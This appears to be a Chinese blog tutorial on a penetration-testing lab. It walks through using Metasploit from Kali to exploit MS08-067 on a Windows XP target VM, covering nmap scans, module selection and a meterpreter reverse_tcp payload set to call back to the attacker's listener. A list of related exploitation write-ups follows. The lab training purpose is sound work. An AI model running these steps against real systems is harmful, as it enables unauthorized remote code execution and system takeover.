渗透测试基础-1 针对MS08-067漏洞

已于 2022-05-09 16:52:15 修改
阅读量424 收藏 2
点赞数
文章标签: linux 安全
于 2022-05-07 10:45:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhangyixing_mj/article/details/124623950
版权

一、准备工作

工具环境:kali 下载安装

靶场环境:windows xp

1.kali切换到root权限。有两种方式:直接切换到管理员权限,这种方式虽然比较方便,但是也比较危险,root权限很大,如果有误操作会产生较大的影响;当某些操作需要管理员权限时,临时提权,该操作结束后,恢复普通用户权限。推荐第二种方发

sudo su #切换到管理员权限下

sudo ifconfig #临时对ifconfig操作提权

2.将kali和靶场winXP设置到同一局域网下,将二者的网络适配器均设置为 仅主机模式。

操作:选中--右键--设置--仅主机模式

查看设置后二者是否在同一局域网下

kali命令

ifconfig

 winXP命令 

ipconfig

 

二、实验操作 

kali中:

msfconsole

nmap -F 192.168.92.0/24 #快速扫描该网段

nmap -T 4 -A 192.168.92.130  #深入扫描该网段中存活的主机

nmap -O 192.168.92.130   #查看OS相关

扫描结果可以看出:winXP版本符合,漏洞对应的端口也是开放的,所以可以断定有可能利用该漏洞。实际中,此时会进行一个语言,自己搭建一个靶场环境,模拟攻击,以便提高真实攻击的成功率。

search ms08-067   #查看是否有该漏洞的信息

use 0   #利用库中的攻击代码

show options   #查看参数

#需要补全参数

set PAYLOAD windows/meterpreter/reverse_tcp

show options #查看需要补全的参数

set RHOSTS 192.168.92.130    #设置攻击目标
set LHOST 192.168.92.129     #设置监听主机

show options   #查看设置好的参数,确定一下

run  #执行攻击,返回session视为成功

 现在到meterpeter中

 

help   #查看命令

进入对方的文件系统

 

aryaX
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ATT&CK红队评估(红日靶场一)
weixin_45682839的博客
03-10 1370
靶场搭建 下载地址:漏洞详情 虚拟网络编辑器新建一个仅主机模式的网络,子网地址改成192.168.52.0(也可以不用新建,但是必须是仅主机模式) 将windows2003和windows2008两台主机都设置为自定义VMnet16 windows7配置 攻击主机kali配置 kali和win7的第二个网卡可以在同一个自定义仅主机模式网段下,也可以同在NAT下 设置好之后,win7主机开启phpsyudy,配置就完成了 win7 内网网段192.168.52.
Metasploit-Framework利用ms08_067 漏洞渗透Windows XP SP3(Windows 10 主机)
Zoran_db
01-21 1571
前期准备 a)攻击主机:为Window10系统(本机) 在Metasploit官方网站下载Windows版本的Metasploit-framework(而不是pro版本),之后安装。在命令行输入 msfconsole 运行Metasploit。 b)目标主机:在网上搜索,安装了WindowsXP虚拟机,在Vmware中装载运行 安装完成后要对WindowsXP虚拟机做如下设置,否则会导致在exploit时显示连接超时或者拒绝连接。关闭防火墙,自动更新即可。 开始渗透测试 查找漏洞 输入命令:searc
Kali Linux渗透实战-MS08-067漏洞攻防实战窍门
hdx柿子的博客
03-27 1160
感谢参考原文-http://bjbsair.com/2020-03-27/tech-info/7088/ 一、MS08-067是什么 MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。 二、影响操作系统 Windows ...
ms08067实验室web靶场-Command
BROTHERYY的博客
09-28 829
打开环境与dvwa的命令注入有点像 这里过滤了很多,尝试用%0a来突破 能够正常执行命令以后,到根目录去寻找flag 直接cat读取flag 得到flag MS08067{0d07a0895471478280dd7effeb530ae7}
MS 08-067失败过程记录
weixin_51387754的博客
06-20 396
建好后开启使用enter FN+F8我同意 由于是选择安装分区。由于我们是新建的虚拟机,所以上面的磁盘是空白的,我们需要先新建分区,按C键新建分区(建议划分2个分区,一个作为系统盘,一个作为数据盘)。 新建分区之后要进行格式化,对C:盘进行格式化。推荐使用NTFS文件系统格式磁盘分区,因为其能支持更多的功能。 格式化完成后虚拟机将自动重启。之后进入安装向导,点击“下一步”。 设置区域及语言,核对一下是否正确。点击“下一步”。 输入姓名或者单位。这个不是很重要,随便填一下就可以。 计算机名默认就.
利用win系统ms08-067漏洞.docx
10-26
该模块是Metasploit中專门针对MS08-067漏洞的exploit模块。 3. 加载该模块并查看该模块相关参数 使用use命令加载MS08-067模块,并使用info命令来查看该模块的相关参数。这些参数包括exploit的目标IP地址、攻击的...
使用metasploit攻击实例讲解1-ms10-046快捷方式图标漏洞
最新发布
12-29
本主题将深入探讨一个具体的实例,即“ms10-046快捷方式图标漏洞”利用,以及如何通过Metasploit框架进行渗透测试。Metasploit是一款广泛使用的开源安全工具,它包含了大量预构建的攻击模块,便于安全专家进行漏洞...
MS09-001漏洞利用程序-GUI
02-19
在安全研究和渗透测试中,理解漏洞的工作原理、如何利用以及如何防护是非常重要的。因此,这个GUI工具可以帮助安全专家和管理员更好地理解和应对MS09-001漏洞。 需要注意的是,"MS09-011利用程序.exe"可能是另一个...
AD-Pentest-Script:Active Directory渗透测试脚本
05-19
渗透测试(Penetration Testing)是网络安全领域的一个重要概念,它模拟黑客攻击行为,以发现并修复系统中的漏洞。在Active Directory(AD)环境中,这种测试对于保护企业网络资源至关重要,因为AD通常存储着用户...
基于metasploit框架的渗透测试方法研究
12-15
对于CVE-2020-0796和ms17-010这类高危漏洞,及时的渗透测试和补丁应用至关重要,因为这些漏洞可能被恶意攻击者利用,导致严重的数据泄露或系统瘫痪。 【结论】 Metasploit框架为安全专业人员提供了强大的工具,...
MS08067,MS10061漏洞靶机环境搭建.docx
07-07
MS08067,MS10061漏洞靶机环境搭建过程,演示靶机的搭建过程,用于攻防演练,渗透小白可以看一下
【安全练兵场】| BurpSuite靶场系列之身份验证
Ms08067安全实验室
10-18 201
文章来源|MS08067 安全练兵场 知识星球本文作者:godunt(安全练兵场星球合伙人)玩靶场 认准安全练兵场成立"安全练兵场"的目的目前,安全行业热度逐年增加,很多新手安全从业人员在获取技术知识时,会局限于少量的实战中,技术理解得不到升华,只会像个脚本小子照着代码敲命令,遇到实战时自乱阵脚,影响心态的同时却自叹不如。而安全练兵场是由理论知识到实战过渡的一道大门,安全练兵场星球鼓励大家从实战中...
MS08-067漏洞 远程溢出入侵测试
luoshenwei3533的博客
10-06 1万+
MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程履行代码。在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击.  MS08_067漏洞渗透...
MS08067 “安全练兵场”战术空袭~
Ms08067安全实验室
10-18 2137
成立"安全练兵场"的目的目前,安全行业热度逐年增加,很多新手安全从业人员在获取技术知识时,会局限于少量的实战中,技术理解得不到升华,只会像个脚本小子照着代码敲命令,遇到实战时自乱阵脚,影响...
ms08-067漏洞 远程溢出入侵测试
热门推荐
十年磨一剑,霜刃未曾试!
09-25 3万+
被攻击者IP地址:192.168.9.4,操作系统Windows XP sp3 English 攻击者IP地址:192.168.9.1   //查看数据库连接状态 msf > db_status [*] postgresql connected to msf3 //使用nmap扫描目标机器 msf > db_nmap -sS -sV -O --script=smb-check...
MS08-067漏洞渗透测试
抬山的博客
11-10 2332
MS08-067漏洞会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta 1.安装靶机 下载window xp sp3 英文版镜像并安装在vmvare虚拟机上 靶机ip:192.168.65.128 ...
MS08-067靶机下载
边城浪子的博客
09-08 1655
利用Windows平台MS08-067漏洞,成功进行远程命令执行操作,无奈没有靶机实验,真实的互联网中也没有这样的漏洞啊。 MS08-067靶机下载地址 链接: https://pan.baidu.com/s/13IS0vBZTduDHdInOrO4pyQ 提取码: ip53
MS08067/MS10061漏洞靶机环境搭建总结
SQL_injection的专栏
08-15 1万+
MS08067/MS10061漏洞靶机环境搭建总结
kali利用msf工具对ms08-067漏洞入侵靶机(win xp2)
qq_50854662的博客
05-16 5884
kali利用msf工具对ms08-067漏洞入侵靶机(win xp2) 漏洞简介 MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。 如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利
2022太原理工大学网络攻防实验:MS08_067漏洞渗透测试
"该实验指导书主要针对太原理工大学的网络攻防课程,涵盖了四个关键实验:MS08_067漏洞验证与利用、SQL注入靶场练习、文件上传漏洞利用和文件包含漏洞的利用与防护。实验目标是让学生熟悉常见的网络安全漏洞验证方法...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值